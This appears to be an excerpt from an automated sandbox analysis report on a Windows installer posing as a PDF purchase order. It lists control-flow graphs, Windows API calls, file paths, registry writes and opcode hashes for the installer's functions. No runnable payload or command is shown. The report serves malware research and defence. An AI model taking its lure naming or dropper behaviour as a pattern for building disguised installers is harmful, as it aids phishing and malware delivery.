                                                                                                            control_flow_graph 360 40389e-4038b6 call 40642b 363 4038b8-4038c3 GetUserDefaultUILanguage call 405f9c 360->363 364 4038ca-403901 call 405f22 360->364 367 4038c8 363->367 370 403903-403914 call 405f22 364->370 371 403919-40391f lstrcatW 364->371 369 403924-40394d call 403b74 call 405b11 367->369 377 403953-403958 369->377 378 4039df-4039e7 call 405b11 369->378 370->371 371->369 377->378 379 40395e-403986 call 405f22 377->379 384 4039f5-403a1a LoadImageW 378->384 385 4039e9-4039f0 call 406077 378->385 379->378 386 403988-40398c 379->386 388 403a9b-403aa3 call 40140b 384->388 389 403a1c-403a4c RegisterClassW 384->389 385->384 390 40399e-4039aa lstrlenW 386->390 391 40398e-40399b call 405a36 386->391 402 403aa5-403aa8 388->402 403 403aad-403ab8 call 403b74 388->403 392 403a52-403a96 SystemParametersInfoW CreateWindowExW 389->392 393 403b6a 389->393 397 4039d2-4039da call 405a09 call 406055 390->397 398 4039ac-4039ba lstrcmpiW 390->398 391->390 392->388 396 403b6c-403b73 393->396 397->378 398->397 401 4039bc-4039c6 GetFileAttributesW 398->401 405 4039c8-4039ca 401->405 406 4039cc-4039cd call 405a55 401->406 402->396 412 403b41-403b49 call 405287 403->412 413 403abe-403ad8 ShowWindow call 4063bf 403->413 405->397 405->406 406->397 420 403b63-403b65 call 40140b 412->420 421 403b4b-403b51 412->421 418 403ae4-403af6 GetClassInfoW 413->418 419 403ada-403adf call 4063bf 413->419 425 403af8-403b08 GetClassInfoW RegisterClassW 418->425 426 403b0e-403b31 DialogBoxParamW call 40140b 418->426 419->418 420->393 421->402 422 403b57-403b5e call 40140b 421->422 422->402 425->426 430 403b36-403b3f call 4037ee 426->430 430->396
                                                                                                            APIs
                                                                                                              • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                              • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                            • GetUserDefaultUILanguage.KERNELBASE(00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe"), ref: 004038B8
                                                                                                              • Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9
                                                                                                            • lstrcatW.KERNEL32(1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe"), ref: 0040391F
                                                                                                            • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,74DF3420), ref: 0040399F
                                                                                                            • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 004039B2
                                                                                                            • GetFileAttributesW.KERNEL32(Call), ref: 004039BD
                                                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving), ref: 00403A06
                                                                                                            • RegisterClassW.USER32(00433EA0), ref: 00403A43
                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A5B
                                                                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A90
                                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403AC6
                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403AF2
                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403AFF
                                                                                                            • RegisterClassW.USER32(00433EA0), ref: 00403B08
                                                                                                            • DialogBoxParamW.USER32(?,00000000,00403C41,00000000), ref: 00403B27
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                                                            • String ID: "C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                            • API String ID: 606308-328842823
                                                                                                            • Opcode ID: 1b384d1f77ad73b90eb4ead2ce7446fbf64eb66176232e5d4eff2d39ff252f29
                                                                                                            • Instruction ID: 3415ad5ee5f1eed3d2c0e447cb4c4d8a0153f3b0974deb3f023f39c7f2583bdf
                                                                                                            • Opcode Fuzzy Hash: 1b384d1f77ad73b90eb4ead2ce7446fbf64eb66176232e5d4eff2d39ff252f29
                                                                                                            • Instruction Fuzzy Hash: A361CA706406006FD320AF66AD46F2B3A6CEB8474AF40553FF941B22E2DB7D5D41CA2D

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 433 402dee-402e3c GetTickCount GetModuleFileNameW call 405c2a 436 402e48-402e76 call 406055 call 405a55 call 406055 GetFileSize 433->436 437 402e3e-402e43 433->437 445 402f63-402f71 call 402d8a 436->445 446 402e7c 436->446 438 403020-403024 437->438 452 402f73-402f76 445->452 453 402fc6-402fcb 445->453 448 402e81-402e98 446->448 450 402e9a 448->450 451 402e9c-402ea5 call 403242 448->451 450->451 458 402eab-402eb2 451->458 459 402fcd-402fd5 call 402d8a 451->459 456 402f78-402f90 call 403258 call 403242 452->456 457 402f9a-402fc4 GlobalAlloc call 403258 call 403027 452->457 453->438 456->453 480 402f92-402f98 456->480 457->453 484 402fd7-402fe8 457->484 462 402eb4-402ec8 call 405be5 458->462 463 402f2e-402f32 458->463 459->453 471 402f3c-402f42 462->471 482 402eca-402ed1 462->482 470 402f34-402f3b call 402d8a 463->470 463->471 470->471 475 402f51-402f5b 471->475 476 402f44-402f4e call 4064dc 471->476 475->448 483 402f61 475->483 476->475 480->453 480->457 482->471 486 402ed3-402eda 482->486 483->445 487 402ff0-402ff5 484->487 488 402fea 484->488 486->471 489 402edc-402ee3 486->489 490 402ff6-402ffc 487->490 488->487 489->471 491 402ee5-402eec 489->491 490->490 492 402ffe-403019 SetFilePointer call 405be5 490->492 491->471 494 402eee-402f0e 491->494 495 40301e 492->495 494->453 496 402f14-402f18 494->496 495->438 497 402f20-402f28 496->497 498 402f1a-402f1e 496->498 497->471 499 402f2a-402f2c 497->499 498->483 498->497 499->471
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00402DFF
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe,00000400,?,?,00000000,0040353A,?), ref: 00402E1B
                                                                                                              • Part of subcall function 00405C2A: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                              • Part of subcall function 00405C2A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe,C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00402E67
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                            • String ID: "C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe"$(*B$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                            • API String ID: 4283519449-285992119
                                                                                                            • Opcode ID: 4e6222d9f8d31f850ab2b6b3c84cade23aa30136a505619e7e62f3ee6ab772f2
                                                                                                            • Instruction ID: 7d4f9fc7c678da67c97c1a1890296b71ec8e814f853b941ab64c238268a70fe9
                                                                                                            • Opcode Fuzzy Hash: 4e6222d9f8d31f850ab2b6b3c84cade23aa30136a505619e7e62f3ee6ab772f2
                                                                                                            • Instruction Fuzzy Hash: AF51F731904205ABDB209F61DE89B9F7BB8EB44394F14403BF904B62C1C7B89D409BAD

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 826 401767-40178c call 402bbf call 405a80 831 401796-4017a8 call 406055 call 405a09 lstrcatW 826->831 832 40178e-401794 call 406055 826->832 838 4017ad-4017ae call 4062e9 831->838 832->838 841 4017b3-4017b7 838->841 842 4017b9-4017c3 call 406398 841->842 843 4017ea-4017ed 841->843 850 4017d5-4017e7 842->850 851 4017c5-4017d3 CompareFileTime 842->851 845 4017f5-401811 call 405c2a 843->845 846 4017ef-4017f0 call 405c05 843->846 853 401813-401816 845->853 854 401885-4018ae call 4051b4 call 403027 845->854 846->845 850->843 851->850 855 401867-401871 call 4051b4 853->855 856 401818-401856 call 406055 * 2 call 406077 call 406055 call 40579a 853->856 868 4018b0-4018b4 854->868 869 4018b6-4018c2 SetFileTime 854->869 866 40187a-401880 855->866 856->841 889 40185c-40185d 856->889 870 402a55 866->870 868->869 872 4018c8-4018d3 CloseHandle 868->872 869->872 876 402a57-402a5b 870->876 874 4018d9-4018dc 872->874 875 402a4c-402a4f 872->875 878 4018f1-4018f4 call 406077 874->878 879 4018de-4018ef call 406077 lstrcatW 874->879 875->870 883 4018f9-40228d call 40579a 878->883 879->883 883->876 889->866 891 40185f-401860 889->891 891->855
                                                                                                            APIs
                                                                                                            • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Fasciculi,?,?,00000031), ref: 004017A8
                                                                                                            • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Fasciculi,?,?,00000031), ref: 004017CD
                                                                                                              • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                              • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                              • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                              • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,74DF23A0), ref: 0040520F
                                                                                                              • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                              • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                              • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                              • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                            • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Fasciculi$C:\Users\user\AppData\Local\Temp\nsiEA09.tmp$C:\Users\user\AppData\Local\Temp\nsiEA09.tmp\System.dll$Call
                                                                                                            • API String ID: 1941528284-546978335
                                                                                                            • Opcode ID: 7eb387cec2b929145506f0f371aad0ef0a8c00339c8b79c916bd0341b2f4fd7b
                                                                                                            • Instruction ID: 02e4f6238df89927c362e8fae2a75ca1a565c16d749b69ec27d3a85cbadddcd8
                                                                                                            • Opcode Fuzzy Hash: 7eb387cec2b929145506f0f371aad0ef0a8c00339c8b79c916bd0341b2f4fd7b
                                                                                                            • Instruction Fuzzy Hash: 0941B631900515BACF11BFB5CC45EAF7679EF05328B24423BF522B10E1DB3C86519A6D

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 892 403027-40303e 893 403040 892->893 894 403047-403050 892->894 893->894 895 403052 894->895 896 403059-40305e 894->896 895->896 897 403060-403069 call 403258 896->897 898 40306e-40307b call 403242 896->898 897->898 902 403230 898->902 903 403081-403085 898->903 904 403232-403233 902->904 905 4031db-4031dd 903->905 906 40308b-4030d4 GetTickCount 903->906 909 40323b-40323f 904->909 907 40321d-403220 905->907 908 4031df-4031e2 905->908 910 403238 906->910 911 4030da-4030e2 906->911 912 403222 907->912 913 403225-40322e call 403242 907->913 908->910 914 4031e4 908->914 910->909 915 4030e4 911->915 916 4030e7-4030f5 call 403242 911->916 912->913 913->902 925 403235 913->925 918 4031e7-4031ed 914->918 915->916 916->902 924 4030fb-403104 916->924 921 4031f1-4031ff call 403242 918->921 922 4031ef 918->922 921->902 930 403201-40320d call 405cdc 921->930 922->921 927 40310a-40312a call 40654a 924->927 925->910 934 403130-403143 GetTickCount 927->934 935 4031d3-4031d5 927->935 936 4031d7-4031d9 930->936 937 40320f-403219 930->937 938 403145-40314d 934->938 939 40318e-403190 934->939 935->904 936->904 937->918 940 40321b 937->940 941 403155-40318b MulDiv wsprintfW call 4051b4 938->941 942 40314f-403153 938->942 943 403192-403196 939->943 944 4031c7-4031cb 939->944 940->910 941->939 942->939 942->941 947 403198-40319f call 405cdc 943->947 948 4031ad-4031b8 943->948 944->911 945 4031d1 944->945 945->910 953 4031a4-4031a6 947->953 949 4031bb-4031bf 948->949 949->927 952 4031c5 949->952 952->910 953->936 954 4031a8-4031ab 953->954 954->949
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountTick$wsprintf
                                                                                                            • String ID: jA$ jA$... %d%%
                                                                                                            • API String ID: 551687249-2167919867
                                                                                                            • Opcode ID: d6d85bbee09884fc6a4e27a5c727532f93391e72c67541d57332e7913648c049
                                                                                                            • Instruction ID: 9abceb1f43df10d1a821086e1d45a58eca4464abfa5f2a46825b956852eb5d51
                                                                                                            • Opcode Fuzzy Hash: d6d85bbee09884fc6a4e27a5c727532f93391e72c67541d57332e7913648c049
                                                                                                            • Instruction Fuzzy Hash: AF517C71901259EBDB10CF65DA44BAE7BB8AF05766F10417FF811B62C0C7789E40CBAA

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 955 4025e5-4025fa call 402ba2 958 402600-402607 955->958 959 402a4c-402a4f 955->959 960 402609 958->960 961 40260c-40260f 958->961 962 402a55-402a5b 959->962 960->961 963 402773-40277b 961->963 964 402615-402624 call 405fb5 961->964 963->959 964->963 968 40262a 964->968 969 402630-402634 968->969 970 4026c9-4026cc 969->970 971 40263a-402655 ReadFile 969->971 972 4026e4-4026f4 call 405cad 970->972 973 4026ce-4026d1 970->973 971->963 974 40265b-402660 971->974 972->963 984 4026f6 972->984 973->972 975 4026d3-4026de call 405d0b 973->975 974->963 977 402666-402674 974->977 975->963 975->972 980 40267a-40268c MultiByteToWideChar 977->980 981 40272f-40273b call 405f9c 977->981 980->984 985 40268e-402691 980->985 981->962 988 4026f9-4026fc 984->988 986 402693-40269e 985->986 986->988 989 4026a0-4026c5 SetFilePointer MultiByteToWideChar 986->989 988->981 990 4026fe-402703 988->990 989->986 991 4026c7 989->991 992 402740-402744 990->992 993 402705-40270a 990->993 991->984 994 402761-40276d SetFilePointer 992->994 995 402746-40274a 992->995 993->992 996 40270c-40271f 993->996 994->963 998 402752-40275f 995->998 999 40274c-402750 995->999 996->963 997 402721-402727 996->997 997->969 1000 40272d 997->1000 998->963 999->994 999->998 1000->963
                                                                                                            APIs
                                                                                                            • ReadFile.KERNELBASE(?,?,?,?), ref: 0040264D
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
                                                                                                            • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
                                                                                                              • Part of subcall function 00405D0B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405D21
                                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                            • String ID: 9
                                                                                                            • API String ID: 163830602-2366072709
                                                                                                            • Opcode ID: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                            • Instruction ID: c11c119823ef092d14edb4d445d1eebecf1e4ba29e3308019af08aa6c5ad61e3
                                                                                                            • Opcode Fuzzy Hash: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                            • Instruction Fuzzy Hash: 43510874D00219AADF209F94CA88ABEB779FF04344F50447BE501B72E0D7B99D42DB69

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1001 40237b-4023c1 call 402cb4 call 402bbf * 2 RegCreateKeyExW 1008 4023c7-4023cf 1001->1008 1009 402a4c-402a5b 1001->1009 1010 4023d1-4023de call 402bbf lstrlenW 1008->1010 1011 4023e2-4023e5 1008->1011 1010->1011 1014 4023f5-4023f8 1011->1014 1015 4023e7-4023f4 call 402ba2 1011->1015 1019 402409-40241d RegSetValueExW 1014->1019 1020 4023fa-402404 call 403027 1014->1020 1015->1014 1023 402422-4024fc RegCloseKey 1019->1023 1024 40241f 1019->1024 1020->1019 1023->1009 1026 40281e-402825 1023->1026 1024->1023 1026->1009
                                                                                                            APIs
                                                                                                            • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                                                            • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsiEA09.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                                                            • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsiEA09.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsiEA09.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateValuelstrlen
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsiEA09.tmp
                                                                                                            • API String ID: 1356686001-2212294431
                                                                                                            • Opcode ID: 16ccbc1a4839035df8dee6c69b1955b51d84c24cc9eb413e0f302de5cc057626
                                                                                                            • Instruction ID: e0a93677b1043ce4e8fea40acd1fa81b7363c56b112b112c42ce1ea238d19e9d
                                                                                                            • Opcode Fuzzy Hash: 16ccbc1a4839035df8dee6c69b1955b51d84c24cc9eb413e0f302de5cc057626
                                                                                                            • Instruction Fuzzy Hash: 87118E71A00108BFEB10AFA5DE89EAEB67DEB44358F11403AF904B61D1D7B85E409668

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1027 405683-4056ce CreateDirectoryW 1028 4056d0-4056d2 1027->1028 1029 4056d4-4056e1 GetLastError 1027->1029 1030 4056fb-4056fd 1028->1030 1029->1030 1031 4056e3-4056f7 SetFileSecurityW 1029->1031 1031->1028 1032 4056f9 GetLastError 1031->1032 1032->1030
                                                                                                            APIs
                                                                                                            • CreateDirectoryW.KERNELBASE(?,0040A300,C:\Users\user\AppData\Local\Temp\), ref: 004056C6
                                                                                                            • GetLastError.KERNEL32 ref: 004056DA
                                                                                                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056EF
                                                                                                            • GetLastError.KERNEL32 ref: 004056F9
                                                                                                            Strings
                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004056A9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
